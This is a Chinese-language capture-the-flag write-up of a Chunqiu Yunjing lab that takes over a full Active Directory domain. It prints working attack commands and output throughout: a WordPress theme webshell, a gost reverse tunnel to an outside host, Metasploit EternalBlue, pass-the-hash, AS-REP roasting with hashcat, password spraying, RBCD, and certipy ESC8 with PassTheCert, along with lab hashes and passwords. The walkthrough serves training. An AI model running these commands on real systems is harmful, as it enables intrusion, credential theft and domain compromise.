春秋云镜 2022网鼎杯半决赛复盘

春秋云镜 2022网鼎杯半决赛复盘

flag1

fscan啥也没扫出来

image-20251021211504104

随便点点,看到是WordPress

image-20251021211606983

wpscan一下

wpscan –url http://39.99.133.128/ –disable-tls-checks –stealthy

image-20251021212247090

啥也没有,fw wpscan

wp默认后台路径:http://39.99.133.128/wp-login.php

admin/123456登陆

面板写了用了Twenty-One主题

image-20251021214342338

随便挑个文件写马

image-20251021215344952

主题文件的地址:http://39.99.133.128/wp-content/themes/twentytwentyone/search.php

image-20251021215328678

whoami一下看到只是www权限

image-20251021220112874

flag01: flag{660deffe-63b7-4bbd-8a72-f48143ab2f64}

flag2

内网ip 172.22.15.26

上传fscan扫下内网,好像webshell里有点问题?没回显?

./fscan -h 172.22.15.24

扫单个请求有结果,鉴定为超时了或者输出过多溢出了,把超时时间改一下

image-20251021222949481

如果还是不行只有上其他shell了

这里上线vshell,注意vshell要用stageless上线,命令上线需要端口同时支持http和tcp,弹回shell

image-20251024154243167

fscan内网

407cedce7399e13602a94c5e15b197b6

1
2
3
4
5
172.22.15.26 本机
172.22.15.24 winserver2008有MS17010
172.22.15.13 DC01
172.22.15.35 XR-0687 winserver2016
172.22.15.18 XR-CA且有active-directory-certarv-detect POC

先上代理

gost -L socks5://:5555?bind=true

gost -L rtcp://:2222/39.101.175.156:22 -F socks5://39.101.175.156:5555

打172.22.15.24的永恒之蓝,永恒之蓝都推荐直接用msf打(我更喜欢windows msf)

1
2
3
4
5
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.22.15.24
exploit

image-20251024160151615

域用户

image-20251024160213391

image-20251024160250947

flag02: flag{4b959ad6-6979-4a98-a5d2-d973bf59c02b}

flag3

hashdump出现[-] priv_passwd_get_sam_hashes: Operation failed: Access is denied.

image-20251024160909444

根据issue,https://github.com/rapid7/metasploit-framework/issues/15123

需要把msf进程迁移进x64程序目录中

image-20251024161401100

尝试迁移到lsass或者svchost,又有奇怪的错误

sysinfo一下,为啥我用的x64的payload加载上去是x86😡

image-20251024163226428

那看来是win msf有点问题,还是得用Linux msf啊,windows太坑了吧,换了各种bind_tcp payload都不行哦

先抄一个hashdump的结果

1
2
3
4
5
meterpreter > hashdump
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e52d03e9b939997401466a0ec5a9cbc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

pth过去

1
python psexec.py administrator@172.22.15.24 -hashes :0e52d03e9b939997401466a0ec5a9cbc -codec gbk

image-20251024164305129

添加用户

1
2
net user godown qwer1234! /add
net localgroup administrators godown /add

rdp上去

image-20251024164500454

把下面文件保存成.reg文件,管理员运行

1
2
3
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\Parameters]
"AllowEncryptionOracle"=dword:00000002

再次登陆

image-20251024164656651

直接运行桌面上的phpstudy,看到数据库账密

image-20251024164741703

网站根目录为phpMyAdmin

image-20251024164831072

可以在本地翻db文件找敏感信息,不过有phpMyAdmin和账密就登上去看

http://172.22.15.24/phpMyadmin/

root/root@#123

zdoosys_user找到一堆user/password

image-20251024165114784

导出后拿到域里喷洒一波,打的是Certify也打过的kerberoasting攻击,不懂的直接移步

https://godownio.github.io/2025/10/18/chun-qiu-yun-jing-certify/

1
python GetNPUsers.py xiaorang.lab/ -dc-ip 172.22.15.13 -usersfile user.txt -request -outputfile hash.txt

04bf9e2a1c19f152939f5c1d7a44a363

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
D:\tools\impacket-0.12.0\impacket-0.12.0\examples\GetNPUsers.py:165: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
$krb5asrep$23$lixiuying@XIAORANG.LAB:476409ffba0decf3290d18197eacc57c$541ddacf2b1c1ab44bf8c9bef60a541db5aa84200195053527d22e922fa5f7bedb215d9951d4dae64d4c37650748fce7d95b0b900b4d33eff8563f12e4aacbead3ef1c702a35c5b112c6a60047f344ce66ef11c8dc6e1c622378557c0da3ac2b66d4c5c5a9240e97cbff4eabbbf9f71a332d05e5214f3e44cf1b7ee64fef9ea4845a470458c60ef268d806ded764f5640b7df4c673c716747db08c46289413d8190fe7f89841f4a05b2abf210bfc1254501df5194e898d141eb292ec1b89a8ef02c949ac298c906d9bd3b058077786fd535ac35017b37b4c6992968dc0b7ffcd03766e585015ce0c1c880ead
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
$krb5asrep$23$huachunmei@XIAORANG.LAB:71e63db3b9074a65b02140fef43035ed$c521d4e2573ae20947a037980fe3fe46393ccd9c141401c3e73c51b1f005903cc1698117355e3b4bd6f5e307397eff54b96042677e71f1a38ec0b1c59fa794cbb8875c807afcbc75c090acef73c369a528c4a97c62d0f7fb135db1b34a16202093a314659a19c95ed96e73b46af2a4fd978e418f6b3ead6acb267f11e70a5b41389651585b25069e054d75a6226c2bacf1dcc1c64908561431105373450fa42f04edcd86dd105f444eb0b22f8322bba52f9a300176a19e7522a3e882da8b5f9dd3b13ee9ab2195aa71e01daf04d5e8619118e3389705ac23cfb00767ffdfdd0c50cf7a7840b144051543e137
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User lihongxia doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User wangyulan doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User chenjianhua doesn't have UF_DONT_REQUIRE_PREAUTH set

得到两个TGT票据,拿去hashcat一下解出明文

1
hashcat TGT.txt /usr/share/wordlists/rockyou.txt
1
2
lixiuying@xiaorang.lab   winniethepooh
huachunmei@xiaorang.lab   1qaz2wsx

域内喷洒一波密码:

1
2
proxychains4 crackmapexec rdp 172.22.15.18 172.22.15.13 172.22.15.35 -d xiaorang.lab -u huachunmei -p '1qaz2wsx'
proxychains4 crackmapexec rdp 172.22.15.18 172.22.15.13 172.22.15.35 -d xiaorang.lab -u lixiuying  -p 'winniethepooh'

(懒得上kali了

爆出来在35机器上两个用户都能登陆

https://github.com/shigophilo/tools/blob/master/PowerView.ps1

连上35后,SharpHound一波

image-20251024173907248

看到35对域控有GenericWrite,那又是RBCD或者DCSync挑一个打

上传https://github.com/shigophilo/tools/blob/master/PowerView.ps1

cmd里输入powershell可以导入

576696638e9ce1265117312cdd59dc33

其实都不用PowerView,之前总结过了

1
2
3
4
5
6
python addcomputer.py xiaorang.lab/lixiuying:winniethepooh -dc-ip 172.22.15.13 -dc-host xiaorang.lab -computer-name TEST$ -computer-pass P@ssw0rd

python rbcd.py xiaorang.lab/lixiuying:winniethepooh -dc-ip 172.22.15.13 -action write -delegate-to XR-0687$ -delegate-from TEST$

python getST.py xiaorang.lab/TEST$:P@ssw0rd -spn cifs/XR-0687.xiaorang.lab -impersonate Administrator -dc-ip 172.22.15.13

image-20251024173133910

用保存下来的cache去登陆

1
2
set KRB5CCNAME=Administrator@cifs_XR-0687.xiaorang.lab@XIAORANG.LAB.ccache
python psexec.py Administrator@XR-0687.xiaorang.lab -k -no-pass -dc-ip 172.22.15.13

加个hosts

image-20251024174240032

image-20251024174320656

flag03: flag{7b8a442b-5249-4dd1-ae03-84e022f1d72a}

flag4

最后一个flag本来应该是打certipy证书模板的,但是报错KDC_ERR_PADATA_TYPE_NOSUPP

先查找一下漏洞证书模板

1
certipy find -u lixiuying@xiaorang.lab -p winniethepooh -dc-ip 172.22.15.13 -vulnerable -stdout

image-20251024175051310

1
2
[!] Vulnerabilities
     ESC8                              : Web Enrollment is enabled over HTTP.

打ESC8,添加用户

1
certipy account create -user TEST2$ -pass P@ssw0rd -dns XR-DC01.xiaorang.lab -dc-ip 172.22.15.13 -u lixiuying -p winniethepooh

image-20251024175848370

申请证书模板

1
certipy req -u TEST2$@xiaorang.lab -p P@ssw0rd -ca xiaorang-XR-CA-CA -target 172.22.15.18 -template Machine -dns XR-DC01.xiaorang.lab

image-20251024180020283

模板保存在xr-dc01.pfx

下一步用证书模板去认证,但是题目本身有点问题会报错,不能直接certipy auth -pfx上去

当域控制器没有安装用于智能卡身份验证的证书(例如,使用 “域控制器” 或 “域控制器身份验证” 模板)、用户密码已过期或提供了错误的密码时,可能会出现此问题。

遇到这种情况,则无法使用得到的证书来获取 TGT 或 NTLM 哈希。

AD 默认支持两种协议的证书身份验证: Kerberos PKINIT 协议和 Schannel

尝试 Schannel,通过 Schannel将证书传递到 LDAPS, 修改 LDAP 配置 (例如配置 RBCD / DCSync), 进而获得域控权限。

Secure Channel(Schannel)是 Windows 在建立 TLS/SSL 连接时利用的 SSP。默认情况下,AD 环境中没有多少协议支持通过 Schannel 开箱即用的 AD 身份验证。WinRM、RDP 和 IIS 都支持使用 Schannel 的客户端身份验证,但它需要额外的配置,并且在某些情况下(如 WinRM)不与 Active Directory 集成。令一种通常有效的协议是 LDAPS(又名 LDAP over SSL/TLS)。事实上,从 AD 技术规范(MS-ADTS)中了解到,甚至可以直接对 LDAPS 进行客户端证书身份验证。

https://whoamianony.top/posts/pass-the-certificate-when-pkinit-is-nosupp/

下载https://github.com/AlmondOffSec/PassTheCert/blob/main/Python/passthecert.py

1
2
3
4
openssl pkcs12 -in xr-dc01.pfx -nodes -out test.pem
openssl rsa -in test.pem -out test.key
openssl x509 -in test.pem -out test.crt

image-20251024181248721

传递证书

1
python passthecert.py -action write_rbcd -crt test.crt -key test.key -domain xiaorang.lab -dc-ip 172.22.15.13 -delegate-to XR-DC01$ -delegate-from TEST$

image-20251024181452915

该 POC 执行后,会通过提供的证书认证到 LDAPS,创建一个新的机器账户,并为指定的机器账户设置 msDS-AllowedToActOnBehalfOfOtherIdentity 属性,以执行基于资源的约束委派(RBCD)攻击。相当于新建了一个机器用户去打RBCD

既然新用户已经打完RBCD了,那重新申请一遍ST,用新用户去dump域控TGT

1
2
3
python getST.py xiaorang.lab/TEST$:P@ssw0rd -spn cifs/XR-DC01.xiaorang.lab -impersonate Administrator -dc-ip 172.22.15.13
set KRB5CCNAME=Administrator@cifs_XR-DC01.xiaorang.lab@XIAORANG.LAB.ccache
python psexec.py Administrator@XR-DC01.xiaorang.lab -k -no-pass -dc-ip 172.22.15.13

172.22.15.13 XR-DC01.xiaorang.lab

image-20251024182215797

image-20251024182306117

flag04: flag{134d5b4e-56be-4ef8-9d12-8f9870b821be}

春秋云镜
下一篇:
洞态IAST分析

    • Copyright © 2020 - 2025 godownio | Powered by Hexo | Theme Bamboo

    本站总访问量: |